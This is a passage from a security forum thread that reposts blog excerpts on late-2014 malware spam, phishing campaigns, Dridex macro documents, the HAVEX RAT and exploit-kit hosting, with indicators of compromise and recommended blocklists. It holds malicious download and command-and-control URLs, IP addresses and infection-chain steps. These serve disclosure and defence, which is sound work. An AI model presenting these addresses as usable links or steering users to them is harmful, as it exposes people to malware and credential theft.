... the document is blank and requires the user to enable macros in order to view it. By default Microsoft Office disables macros, a handy automation feature but also a huge security risk. This is where the social engineering lies and the crooks are counting on people so eager to see the promised content that they will push the button and get infected. Macros enable you to create scripts that automate repetitive tasks within a document, for example copying content from one page and pasting it with a different font and color on another. At the same time, a macro can be used to perform a malicious action, which happens to be the case here.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/word_doc.png
... What happens if you were to trust the document? A remote file is downloaded from
hxxp ://jasoncurtis .co.uk/js/bin.exe and ran from the temp folder... It is known as Dridex, a banking Trojan... Macro malware often relies on social engineering to convince the mark to open a file and disable the default protection. It is not terribly sophisticated but yet it has seen a bit of a revive in recent months with -spam- being the preferred delivery method. The best protection against these types of threats is to be particularly cautious before opening attachments, even if they are ‘classic’ Microsoft Office documents... This holiday season, whether you believe in Santa or not, please be extra cautious with offers that sound too good to be true. The bad guys like to make believe, but we’d rather leave them empty handed or send them off with a lump of coal."
___
Fake 'Postal Notification' SPAM - malicious notification.exe
- http://blog.mxlab.eu/2014/12/24/fake-postal-notification-service-emails-from-fedex-download-malicious-notification-exe/
Dec 24, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Postal Notification Service”. This email is sent from the spoofed address “”Fedex >” <voyeuristicxd@ jackpowerspiritbind .us>” and has the following body:
Screenshot: http://img.blog.mxlab.eu/2014/20141224_fedex.gif
The embedded URL, in our sample hxxp ://appimmobilier .com/notification.exe, will download the 58 kB large file notification.exe. The trojan is known as Win32/TrojanDownloader.Wauchos.AF, UDS:DangerousObject.Multi.Generic or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 56 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/de425462f1fb95c91edd01ded9337869053c4a09f11c9bec830c542fc5720be8/analysis/
:fear::fear: :mad:
AplusWebMaster
2014-12-29, 16:05
FYI...
Phish - "Your Netflix Account Has Been Suspeded"
- http://blog.mxlab.eu/2014/12/29/phishing-email-your-netflix-account-has-been-suspeded/
Dec 29, 2014 - "... intercepted a phishing campaign by email with the subject “Your Netflix Account Has Been Suspeded [#654789]”. This email is sent from the spoofed address “”secure@ netflix .ssl .co.uk” <secure@ netflix .ssl .co.uk>” and has the following body:
Screenshot: http://img.blog.mxlab.eu/2014/20141229_netflix_1.gif
In our sample, the URL takes us to the phishing site located at hxxp ://netflix-validation- uk .co .uk/~netflix/authcode.22e2839f6ea44972845f1e0b02f397ba/email_identifier=71a605276e146b93e52b0c1bfb98ade285c337b0a6b7e5f3f560fd5bb11f1d1c/d0446fac4ba6feceb507af17e1b0bca8/Login.php
This shows us an identical copy of the official Netflix login page. Screenshot of the member login form on the phishing web site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_2.gif
After submitting the login and password, the phishing process begins by asking to fill in our billing information.
> http://img.blog.mxlab.eu/2014/20141229_netflix_3.gif
Followed by filling in our credit card details:
> http://img.blog.mxlab.eu/2014/20141229_netflix_4.gif
Our account seems to be updated and we can continue:
> http://img.blog.mxlab.eu/2014/20141229_netflix_5.gif
…. straight to the official Netflix login site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_6.gif "
___
64-bit Version of HAVEX seen - ICS
- http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-version-of-havex-spotted/
Dec 29, 2014 - "The remote access tool (RAT) HAVEX* became the focus of the security industry after it was discovered to have played a major role in a campaign targeting industrial control systems (ICS). While observing HAVEX detections (known by different vendors as Dragonfly, Energetic Bear, and Crouching Yeti), we noticed something interesting. The Dragonfly campaign was previously believed to be compatible with only for 32-bit versions as most mission critical systems would most likely Windows XP, which has since been listed as end of support. In contrast, we came across two interesting infections running on Windows 7 systems. First 64-bit HAVEX Sighting: Based on our analysis (seen in the chain below), a file called TMPpovider023.dll, detected as BKDR64_HAVEX.A, was found, which creates several files in the file system. It should be noted that TMPprovider0<2-digit version number>.dll is a known indicator of HAVEX and is the component of this threat that interacts with the command-and-control (C&C) servers to perform downloads or receive execution commands associated with it.
> File installation chain: http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/64havex1.jpg
... we’re seeing three indicators of BKDR_HAVEX:
- The file TMPProvider023.dll, as indicated above, with the number indicating the version of this HAVEX RAT (v023)
- A dropped file named 34CD.tmp.dll, detected as BKDR_HAVEX.SM. At this point, the file is being repeatedly detected and quarantined by the installed Trend Micro product. This was later found out to be version 29 or v029 of HAVEX.
- C&C communication from the host and back
... a 64-bit file, was upgraded to a 32-bit v029 HAVEX RAT. This now brings us to four files that seem to be interrelated in one single infection, as seen below:
File name SHA1 Compile Date Architecture
%TEMP%\TMPprovider023.dll 997C0EDC9E8E67FA0C0BC88D6FDEA512DD8F7277 2012-10-03 AMD64
%TEMP%\34CD.tmp.dll CF5755D167077C1F8DEEDDEAFEBEA0982BEED718 2013-04-30 I386
%TEMP%\734.tmp.dll BFDDB455643675B1943D4E33805D6FD6884D592F 2013-08-16 I386
%TEMP%\4F2.tmp.dll 8B634C47087CF3F268AB7EBFB6F7FBCFE77D1007 2013-06-27 I386
... In this particular infection, the v023 HAVEX file was using the same command-and-control server as that of the v029 HAVEX file... Currently, we have seen at least four IP addresses communicating to the command-and-control server, two of which have exhibited the behavior of upgrading the version of the C&C module of the HAVEX RAT... the HAVEX RAT has gone through several iterations—used in campaigns with ICS/SCADA and even pharmaceutical targets, nothing prevents it from being used again and again. ICS operators have to take note that the structure of the HAVEX binaries resemble much of what we see in common Windows malware – more so now that we’ve seen Windows 7 64-bit infections. It is thereby important to validate software being installed on endpoints within the environment, and to frequently monitor HTTP traffic..."
(More detail at the trendmicro URL at the top of this post.)
* Havex infection (ICS)/SCADA systems chain:
> http://about-threats.trendmicro.com/resources/images/HAVEX_2.jpg
:mad: :fear:
AplusWebMaster
2014-12-30, 23:01
FYI...
'Worm' removed at hacked South Korea nuclear operator
- http://www.reuters.com/article/2014/12/30/us-nuclear-southkorea-cybersecurity-idUSKBN0K80J620141230
Dec 30, 2014 - "South Korean authorities have found evidence that a low-risk computer "worm" had been removed from devices connected to some nuclear plant control systems, but no harmful virus was found in reactor controls threatened by a hacker. Korea Hydro & Nuclear Power Co Ltd said it would beef up cyber security by hiring more IT security experts and forming an oversight committee, as it came in for fresh criticism from lawmakers following recent hacks against its headquarters. The nuclear operator, part of state-run utility Korea Electric Power Corp, said earlier this month that non-critical data had been stolen from its systems, while a hacker threatened in Twitter messages to close three reactors. The control systems of the two complexes housing those reactors had not been exposed to any malignant virus, Seoul's energy ministry and nuclear watchdog said in a joint statement on Tuesday, adding the systems were -inaccessible- from external networks. The nuclear plant operator said on Tuesday it was increasing the number of staff devoted to cyber security from 53 to around 70, and would set up a committee of internal and external experts to oversee security..."
___
Target hacks hit OneStopParking .com
- http://krebsonsecurity.com/2014/12/target-hackers-hit-onestopparking-com/
Dec 30, 2014 - "Parking services have taken a beating this year at the hands of hackers bent on stealing credit and debit card data. This week’s victim — onestopparking .com — comes compliments of the same organized crime gang thought to be responsible for stealing tens of millions of card numbers from shoppers at Target and Home Depot. Late last week, the cybercrime shop best known for being the first to sell cards stolen in the Target and Home Depot breach moved a new batch of cards taken from an unknown online merchant. Several banks contacted by KrebsOnSecurity acquired cards from this batch, and determined that all had one thing in common: They’d all been used at onestopparking .com, a Florence, Ky. based company that provides low-cost parking services at airport hotels and seaports throughout the United States. Contacted about the suspicious activity that banks have traced back to onestopparking .com, Amer Ghanem, the site’s manager, said the company began receiving complaints from customers about a week before Christmas...
Cards from the “Solidus” base at Rescator map back to One Stop Parking
> http://krebsonsecurity.com/wp-content/uploads/2014/12/solidus-600x291.png
This was the second time in as many weeks that this cybercrime shop –Rescator[dot]cm — has put up for sale a batch of credit cards stolen from an online parking service: On Dec. 16, this KrebsOnSecurity reported that the same shop was selling cards stolen from Park-n-Fly, a competing airport parking reservation service. Sometime over the past few days, Park-n-Fly announced it was suspending its online service... a security update posted on the company’s site*. Park ‘N Fly noted that it is still taking reservations over the phone... Last month, SP Plus — a Chicago-based parking facility provider — said** payment systems at 17 parking garages in Chicago, Philadelphia and Seattle that were -hacked- to capture credit card data after thieves installed malware to access credit card data from a remote location. Card data stolen from those SP+ locations ended up for sale on a competing cybercrime -store- called Goodshop. In Missouri, the St. Louis Parking Company recently disclosed*** that it learned of a breach involving card data -stolen- from its Union Station Parking facility between Oct. 6, 2014 and Oct. 31, 2014."
* http://www.pnf.com/security-update/
** http://www.qconline.com/news/illinois/parking-garages-hacked-for-credit-card-data/article_dabd4256-2aa2-5005-b09e-30feecb95eb1.html
*** http://stlouisparking.com/press-release/
___
Instagram Profile Deletion Hoax
- https://blog.malwarebytes.org/fraud-scam/2014/12/january-1st-instagram-profile-deletion-hoax/
Dec 30, 2014 - "... accounts on Instagram claiming a mass purge is coming on January 1, 2015 unless your account is “verified”, with the aid of a so-called Verification Arrow. Profiles such as the one below (with 110k followers at time of writing) are receiving a fair amount of traction with between 5,000-8,000 likes per image (I got 6 for a picture of a cat once), stating:
If your account doesn't have a picture of an arrow next to it then it's in the process of being deleted. To get your arrow, please follow the instructions below
1) Follow @verifyingarrows
2) Repost our photo
3) Tag @verifyingarrows
4) Hashtag #verifyingarrows
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow2.jpg
Here’s a similar profile – now deleted – which managed to grab 245k followers before being banned itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/instaarrow1.jpg
The “arrow” in question appears to be nothing more than a drop down box on profiles which suggests accounts similar to the one you’re looking at. It has -nothing- to do with profile verification or dodging deletion waves. Regardless, panicked Instagram users appear to be jumping on the ban(d)wagon and doing what they can to fend off a profile extinction event that is never going to arrive. In terms of what the ultimate end game is with all of this, it’s a case of wait and see for the time being. This is either just a -hoax- for the sake of it, or maybe the accounts asking people to bolster their visibility on Instagram will suddenly start selling something come the New Year. Whatever they’re up to, you can safely -ignore- these profiles and carry on taking selfies and pictures of sandwiches, with or without a filter."
___
Apple Store 'Transaction Cancellation Form' Phish...
- http://www.hoax-slayer.com/apple-store-transaction-cancellation-phishing-scam.shtml
Dec 30, 2014 - "According to this email, which purports to be from Apple, you have purchased a TomTom from the Apple Store (GPS car navigation system). The email explains that, if you did not authorise the TomTom purchase, you should click-a-link-to-access an Apple Store Transaction Cancellation Form. Supposedly, by filling in the form, the purchase will be cancelled and you will receive a full refund. However, the email is -NOT- from Apple and the claim that you have bought a Tom Tom is just a ruse designed to trick you into clicking the 'cancel' link.
Clicking the link takes you to a website that hosts a -fake- Apple Store 'Cancellation' form. The -fake- form asks you to provide name and contact details as well as your credit card and banking information.
Clicking the 'Cancel Transaction' button will send all of your information to criminals who can then use it to commit financial -fraud- and identity theft.
The scammers bank on the fact that at least a few recipients of the email will be -panicked- into clicking the link and supplying their information in the mistaken belief that someone has made fraudulent purchases in their name."
> http://www.hoax-slayer.com/images/apple-store-transaction-cancellation-phishing-scam-1.jpg
:fear::fear: :mad:
AplusWebMaster
2014-12-31, 21:59
FYI...
'NetGuard Toolbar' SPAM
- http://blog.dynamoo.com/2014/12/netguard-toolbar-ngcmpcom-spam.html
31 Dec 2014 - "Sometimes a spam comes through and it isn't immediately obvious what they are trying to do:
From: Brad Lorien [bclorien@ ngcmp .com]
Date: 31 December 2014 at 01:12
Subject: Real estate (12/30/2014)
Our company reaches an online community of almost 41 million people,
who are mostly US and Canadian based. We have the ability to present
our nearly 41 million strong network with a best, first choice when
they are looking online for what your company does.
We are seeking a preferred choice to send our people who are looking
for real estate in Abilene and surrounding markets.
I’m in the office weekdays from 9:00 AM to 5:00 PM Pacific time.
Best regards,
Brad Lorien
Network Specialist, SPS EServices
Phone: (877) 489.2929, ext. 64
There is no link or attachment in the email. So presumably the spammer is soliciting replies to the email address bclorien@ ngcmp .com which is a valid address. The domain ngcmp.com uses a mail server mail.ngcmp .com to receive email messages, hosted on 38.71.66.127 (PSInet / Virtual Empire, US)... the spam was sent via a relay at 38.71.66.126 which is one IP different from the server handling incoming mail, which pretty much firmly identifies that whoever controls the ngcmp .com domain is actually sending the spam. The mail headers also identify the originating IP as well as the relay, which is a Verizon Wireless customer at 75.215.49.211, possibly someone sending spam using throwaway cell phones to avoid being traced. An examination of those two PSInet addresses shows the following domains are associated with them:
ncmp .co
ngmp .co
ngcmp .com
ng-portal .com
ngcmp .net
ng-central .net
luxebagscloset .com
reviewwordofmouth .com
All of these domains have -anonymous- WHOIS details, but you can see that there is a common pattern here. I don't recommend that you visit spam sites... I did in this case to see what it was about:
> https://2.bp.blogspot.com/-HeHlNoeUd6U/VKPab3DijjI/AAAAAAAAGEU/GhzY1GyW6ok/s1600/netguard.png
This is basically -adware- . Going back to the original spam message, these "41 million people" are presumably suckers who have downloaded this crap, and NG Systems are busy spamming out to find more low-life advertisers to fill up their network... Predictably, there seems to be -no- such corporation as "NG Systems", but if you download the Toolbar it turns out it is digitally -signed- by a company called "IP Marketing Concepts, Inc." ... The executable itself is tagged by only one AV engine* as malicious, but VirusTotal does note that it looks like a PUA. Malwr notes** that individual components appear to be Russian in origin. So all in all, this spam is being sent out by a company that goes a very, very long way to disguise its origins..."
* https://www.virustotal.com/en/file/75bd42a0ce57389cdbbcc0db9c0221e041a3a56612068a02da8425a5d860b132/analysis/1420024818/
** https://malwr.com/analysis/ZjdjZDYzMzVlZTkzNDAwM2E2Y2U1NzRjNTUyNjhmNjM/
___
PUP borrows tricks from malware authors
- https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/
Dec 31, 2014 - "... These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/back-965x395.png
Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they:
Provide a value added service to users by suggesting additional programs tailored to the users’ needs.
Offer a way for software manufacturers to monetize their free applications.
Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows:
Name: adobe_flash_setup.exe
Size: 809.0 KB
MD5: d549def7dd9006954839a187304e3835
imphash: 884310b1928934402ea6fec1dbd3cf5e
Out of the box: The first thing we noticed was that the program behaves differently whether it is launched on a real physical machine or a Virtual Machine:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/schema-1024x782.png
In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player... There might be a few reasons for this:
To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics.
To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers.
Anti-vm behavior does not necessarily mean that the application is malicious, but it -is- something that many malware authors use... The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan* hints at a connection with InstallCore, a “digital content delivery platform”... There are also various other offers bundled in this installer, courtesy of “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies... Malwarebytes’ criteria for listing a program as a PUP can be viewed here**. The list is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations. Consumers should be able to make educated choices rather than being mislead down a path that they didn’t intend to take..."
* https://www.virustotal.com/en/file/7ecf874ceba964fdc32e989e7c706b3f3e28cbfa906c7f371a24cbae11276d0b/analysis/
** https://www.malwarebytes.org/pup/
:fear: :mad:
AplusWebMaster
2015-01-02, 02:35
FYI...
Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@ inet .ba
- http://blog.dynamoo.com/2014/12/evil-network-2177150024-eltakabel-as.html
31 Dec 2014 - "This post by Brian Krebs* drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics**..
** http://www.google.com/safebrowsing/diagnostic?site=AS:198252
Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large*** collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts. An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very -many- bad sites...
*** http://bgp.he.net/AS198252#_prefixes
... appears to be a block suballocated to someone using the email address aadeno@ inet .ba. I took a look at the sites hosted in this /24... There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.
Recommended blocklist:
217.71.50.0/24 ..."
(Long list at the dynamoo URL at the top.)
* http://krebsonsecurity.com/2014/12/lizard-kids-a-long-trail-of-fail/
:fear::fear: :mad:
AplusWebMaster
2015-01-02, 15:00
FYI...
binarysmoney .com / clickmoneys .com / thinkedmoney .com "job" SPAM
- http://blog.dynamoo.com/2015/01/binarysmoneycom-clickmoneyscom.html
2 Jan 2015 - "I've been plagued with these for the past few days:
Date: 2 January 2015 at 11:02
Subject: response
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
We cooperate with different countries and currently we have many clients in the world.
Part-time and full-time employment are both currently important.
We offer a flat wage from $1500 up to $5000 per month.
The job offers a good salary so, interested candidates please registration on the our site: www .binarysmoney .com
Attention! Accept applications only on this and next week.
Respectively submitted
Personnel department
Subject lines include:
New employment opportunities
Staff Wanted
Employment invitation
new job
New job offer
Interesting Job
response
Spamvertised sites seen so far are binarysmoney .com, clickmoneys .com and thinkedmoney .com, all multihomed on the following IPs:
46.108.40.76 (Adnet Telecom / "Oancea Mihai Gabriel Intreprindere Individuala", Romania)
201.215.67.43 (VTR Banda Ancha S.A., Chile)
31.210.63.94 (Hosting Internet Hizmetleri Sanayi Ve Ticaret Anonim Sirketi, Turkey)
Another site hosted on these IPs is moneyproff .com. All the domains have apparently -fake- WHOIS details.
It looks like a money mule spam, but in fact it leads to some binary options trading crap.
> http://2.bp.blogspot.com/-91ORuyJxnpU/VKZ0LXPbKMI/AAAAAAAAGFA/cngzfgKroWg/s1600/binary-options.jpg
... that's just a Shutterstock stock photo that is pretty widely used on the web. In fact, everything about this whole thing is a cookie-cutter site with text and images copied from elsewhere. Binary options are a haven for scammers, and my opinion is that this is such a -scam- given the spammy promotion and hidden identity of the operators. I would recommend that you avoid this and also block traffic to the following IPs and domains:
46.108.40.76
201.215.67.43
31.210.63.94
clickmoneys .com
thinkedmoney .com
binarysmoney .com
moneyproff .com"
:fear::fear: :mad:
AplusWebMaster
2015-01-03, 19:31
FYI...
Fake 'Thank you' SPAM - malware
- http://myonlinesecurity.co.uk/thank-buying-acrobat-xi-pro-malware/
3 Jan 2015 - "'Thank you for buying from Acrobat XI Pro' pretending to come from Plimus Sales <receipt@ plimus .com> with a link to a malicious website is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Plimus is a genuine affiliate marketing service/reseller/payment gateway for many software companies including Adobe. If you look carefully at the email, you can see the links are to IPLIMUS -not- plimus...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Thank-you-for-buying-from-Acrobat-XI-Pr.jpg
3 January 2015: adbx1pro.exe : | Current Virus total detections: 25/56*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e06e0f9ceca9896713b2d54b6f3d05a981ed370a39f4bd8560df6ab369d3fb5/analysis/1420298571/
:fear::fear: :mad:
AplusWebMaster
2015-01-05, 15:53
FYI...
Phish - 'Tesco Important Notification' ...
- http://myonlinesecurity.co.uk/tesco-important-notification-phishing/
5 Jan 2015 - "'Tesco Important Notification' pretending to come from Tesco .com offering you -free- Tesco vouchers is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well. If you are unwise enough to fill in the personal details and security questions, there is a very high likelihood that information could be used to compromise any other account or log in ANYWHERE on the net... don’t ever click the link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco -bank- website but you can clearly see in the address bar, that it is -fake- ... Some versions of this -phish- will ask you fill in the html ( webpage) form that comes attached to the email...
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2-1024x534.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3-1024x746.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4-1024x625.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
:fear: :mad: :fear:
AplusWebMaster
2015-01-06, 15:26
FYI...
hqq .tv serving up Exploit kit (via Digital Ocean and Choopa)
- http://blog.dynamoo.com/2015/01/hqqtv-serving-up-exploit-kit-via.html
6 Jan 2014 - "... here's an infection chain starting from a scummy-looking video streaming site called cine-stream .net. I do not recommend visiting any of the sites labelled [donotclick]
Step 1
[donotclick]cine-stream .net/1609-le-pre-nol-est-une-ordure-en-streaming.html
89.248.170.206 (Ecatel Ltd, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561240827
Step 2
[donotclick]hqq .tv/player/embed_player.php?vid=7SO84O65X5SM&autoplay=no
199.83.130.198 (Incapsula, US)
Step 3
[donotclick]agroristaler .info/dasimotulpes16.html
128.199.48.44 (Digital Ocean, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420561209263
Step 4
[donotclick]aflesministal .info/chat.html
178.62.147.144 (Digital Ocean, Netherlands)
128.199.52.108 (Digital Ocean, Netherlands)
Step 5
[donotclick]pohfefungie .co.vu/VUZQBUgAAgtAGlc.html
[donotclick]eixaaweexum .co.vu/VxFVBkgAAgtAGlc.html
108.61.165.69 (Choopa LLC / Game Servers, Netherlands)
URLquery report: http://urlquery.net/report.php?id=1420560803160
The Digital Ocean and Choopa IPs host several apparently malicious domains:
108.61.165.69
eixaaweexum .co.vu
ienaakeoke .co.vu
weswalkers .co.vu
pohfefungie .co.vu
vieleevethu .co.vu
178.62.147.144
128.199.52.108
sebitibir .info
abrisgalor .info
aflesministal .info
128.199.48.44
abibruget .info
alsonutird .info
fiflakutir .info
fistikopor .info
agroristaler .info
poliloparatoser .info
In my opinion, .co.vu domains are often bad news and are good candidates for blocking. In the mean time I would recommend the following -minimum- blocklist:
108.61.165.69
178.62.147.144
128.199.52.108
128.199.48.44 "
___
Fake 'National Payments Centre' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html
6 Jan 2015 - "This -fake- financial spam has a malicious payload:
Date: 6 January 2015 at 08:56
Subject: This is your Remittance Advice #ATS29858
DO NOT REPLY TO THIS EMAIL ADDRESS
Please find attached your remittance advice from Saint Gobain UK.
For any queries relating to this remittance please notify the Payment Enquiry Team on 01484913947
Regards,
SGBD National Payments Centre
Note that this email is a forgery. Saint Gobain UK are -not- sending the spam, nor have their systems been compromised in any way. Instead, criminals are using a -botnet- to spam out malicious Excel documents. Each email has a different reference number, and the attachment file name matches. The telephone number is randomly generated in each case, using a dialling code of 01484 which is Huddersfield (in the UK). There will probably be a lot of confused people in Huddersfield at the moment.
There are actually four different versions of the -malicious- Excel file, none of which are detected by anti-virus vendors [1] [2] [3] [4] containing four different but similar macros... which then download a component from one of the following locations:
http ://213.174.162.126:8080 /mans/pops.php
http ://194.28.139.100:8080 /mans/pops.php
http ://206.72.192.15:8080 /mans/pops.php
http ://213.9.95.58:8080 /mans/pops.php
This file is downloaded as test.exe and it then saved as %TEMP%\1V2MUY2XWYSFXQ.exe. It has a VirusTotal detection rate of just 3/48*. That report shows that the malware then connects to the following URLs:
http ://194.146.136.1:8080/
http ://179.43.141.164/X9BMtSKOfaz/e&WGWM+o%3D_c%26%248/InRRqJL~L
http ://179.43.141.164/TiHlXjsnCOo8%2C/fS%24P/VZFrel2ih%2Dlv+%26aTn
http ://179.43.141.164/suELl1XsT%2CFX.k%26z4./sn%3F=/%3Ffw/HFBN@8J
http ://179.43.141.164/fhmhi/igm/c&@%7E%2Dj.==m~cg_%2B%2C%3Daggs.%2Dkgm%26$~@fk@g/a%2Cgm+lkb%2D.~$kh/
194.146.136.1 is allocated to PE "Filipets Igor Victorovych" in Ukraine. 179.43.141.164 is Private Layer Incin Panama. I would definitely recommend blocking them and possibly the entire /24s in which they are hosted. The Malwr report shows no activity, indicating that it is hardened against analysis.
Recommend blocklist:
194.146.136.1
179.43.141.164
213.174.162.126
194.28.139.100
206.72.192.15
213.9.95.58 "
1] https://www.virustotal.com/en/file/71fbb660463658b2b4d1da37286d66eba65c9732bd2c1ce1a4834071eca03451/analysis/1420539739/
2] https://www.virustotal.com/en/file/48ae571eb549056c3f6ff192c3dac181d3c9ef1f78b6ea8cca0baefdcacf0bc7/analysis/1420539746/
3] https://www.virustotal.com/en/file/11a175b70117924b4b7b547277e283408bb2777db0835c774352d4344bbea86f/analysis/1420539753/
4] https://www.virustotal.com/en/file/fa4b67f24b7dfda876fbc9fd9fd127048c5799fd005f07a904fa02cff04e8efd/analysis/1420539759/
* https://www.virustotal.com/en/file/eca46cc3a36df9c32dbe967298ddc1f6ee6790179a87b4e17d1d9b0e4bbbf87c/analysis/1420540311/
- http://myonlinesecurity.co.uk/sgbd-national-payments-centre-remittance-advice-excel-xls-malware/
6 Jan 2015
___
Fake 'PAYMENT ADVICE' malware SPAM
- http://blog.dynamoo.com/2015/01/payment-advice-06-jan-2015-malware-spam.html
6 Jan 2015 - "This spam has a malicious attachment:
From: Celeste , Senior Accountant
Date: 6 January 2015 at 10:13
Subject: PAYMENT ADVICE 06-JAN-2015
Dear all,
Payment has been made to you in amount GBP 18898,28 by BACS.
See attachment.
Regards,
Celeste
Senior Accountant
I have only seen one sample so far, with a document BACS092459_473.doc which has a VirusTotal detection rate of 0/56* and which contains this macro... which attempts to download an additional component from:
http ://206.72.192.15:8080 /mans/pops.php
This is exactly the same file as seen in this parallel spam run** today and it has the same characteristics."
* https://www.virustotal.com/en/file/56d6b5053ad57f94ab73ff3b57a3aed5cf336f1600986e8a3634f2840602e215/analysis/1420543064/
** http://blog.dynamoo.com/2015/01/malware-spam-sgbd-national-payments.html
- http://myonlinesecurity.co.uk/senior-accountant-payment-advice-06-jan-2015-word-doc-malware/
6 Jan 2015
___
MS warns of new malware attacks w/ Office docs
- http://www.techworm.net/2015/01/microsoft-warns-new-malware-attacks-office-documents.html
Jan 5, 2015 - "Microsoft has warned its Microsoft Office users of significant rise in malware attacks through macros in Excel and Word programs. In a report published on its blog*, Microsoft says that there is more than a threefold jump in the malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in -emails- masquerading as orders or invoices. The malwares are being spread through spam emails containing following subject lines accordingly to Microsoft:
ACH Transaction Report
DOC-file for report is ready
Invoice as requested
Invoice – P97291
Order – Y24383
Payment Details
Remittance Advice from Engineering Solutions Ltd
Your Automated Clearing House Transaction Has Been Put On ...
...the attachment containing Adnel and Tarbir campaigns is usually named as following :
20140918_122519.doc
813536MY.xls
ACH Transfer 0084.doc
Automated Clearing House transfer 4995.doc
BAC474047MZ.xls
BILLING DETAILS 4905.doc
CAR014 151239.doc
ID_2542Z.xls
Fuel bill.doc
ORDER DETAILS 9650.doc
Payment Advice 593016.doc
SHIPPING DETAILS 1181.doc
SHIP INVOICE 1677.doc
SHIPPING NO.doc
Microsoft Technet blog* says that the two Trojan downloaders, TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir are being spread at a rapid pace through spam emails and phishing campaigns..."
* http://blogs.technet.com/b/mmpc/archive/2015/01/02/before-you-enable-those-macros.aspx
2 Jan 2015
:fear: :mad: :fear:
AplusWebMaster
2015-01-07, 11:50
FYI...
Exploit kits on Choopa LLC / Gameservers .com IP addresses
- http://blog.dynamoo.com/2015/01/exploit-kits-on-choopa-llc.html
7 Jan 2015 - "... The characterstics of these malicious landing pages is that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE:
ooshuchahxe .co.vu
ahjoneeshae .co.vu
phamiephim .co.vu
kaemahchuum .co.vu
pahsiefoono .co.vu
kaghaingai .co.vu
buengaiyei .co.vu
ohmiajusoo .co.vu
oodeerahshe .co.vu
paotuchepha .co.vu
aedeequeekou .co.vu
eikoosiexa .co.vu
phielaingi .co.vu
thohbeekee .co.vu
A typical exploit landing page looks like this* which appears to be the Nuclear EK. These are hosted on the following Choopa LLC / Gamservers .com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:
108.61.165.69: [url]https://www.virustotal.com/en/ip-address/108.61.165.69/information/
108.61.165.70: https://www.virustotal.com/en/ip-address/108.61.165.70/information/
108.61.165.96: https://www.virustotal.com/en/ip-address/108.61.165.96/information/
108.61.167.160: https://www.virustotal.com/en/ip-address/108.61.167.160/information/
108.61.172.139: https://www.virustotal.com/en/ip-address/108.61.172.139/information/
108.61.175.125: https://www.virustotal.com/en/ip-address/108.61.175.125/information/
108.61.177.107: https://www.virustotal.com/en/ip-address/108.61.177.107/information/
108.61.177.89: https://www.virustotal.com/en/ip-address/108.61.177.89/information/
